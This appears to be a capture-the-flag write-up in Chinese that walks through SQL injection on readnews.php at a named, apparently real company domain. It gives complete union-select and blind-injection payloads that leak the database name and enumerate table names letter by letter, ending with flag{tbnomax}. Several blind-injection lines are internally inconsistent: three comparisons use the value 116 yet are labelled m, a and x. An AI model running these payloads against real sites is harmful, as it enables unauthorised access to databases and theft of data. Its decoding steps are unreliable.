进去之后发现 wtf!?
这个怎么可以注入 !??????
经过不断的点击发现
有注入点 哈哈哈哈哈 这样就简单了 按正常步骤来
正常的数字型注入
利用联合查询
http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20select%201,database(),3,4,5%23
爆出数据库为 u9897uwx_kabel
之后组合语句直接查表名
http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20select%201,group_concat(table_name),3,4,5 from information_schema.tables where table_schema='u9897uwx_kabel'%23
怎么说
很皮
根本看不到最后一个表名
只好换一种方法来了
盲注
id=24 and (select count(table_name) from information_schema.tables where table_schema='u9897uwx_kabel')=22%23
发现有二十二个表 所以 需要 爆出第二十二个表
接着就按着 盲注一步一步来 (第一个字母,到最后一个字母)
and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),1,1))=116%23 t
and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),2,1))=98%23 b
and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),3,1))=110%23 n
and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),4,1))=111%23 o
and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),5,1))=116%23 m
and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),6,1))=116%23 a
and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),7,1))=116%23 x
到了第八位发现为0,空格 即就是只有七位,终于报完了。。。。。类似
and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),8,1))=0%23
经过我的一步一步测试,终于爆出表明 为 tbnomax
最后输入 flag{tbnomax}
即可
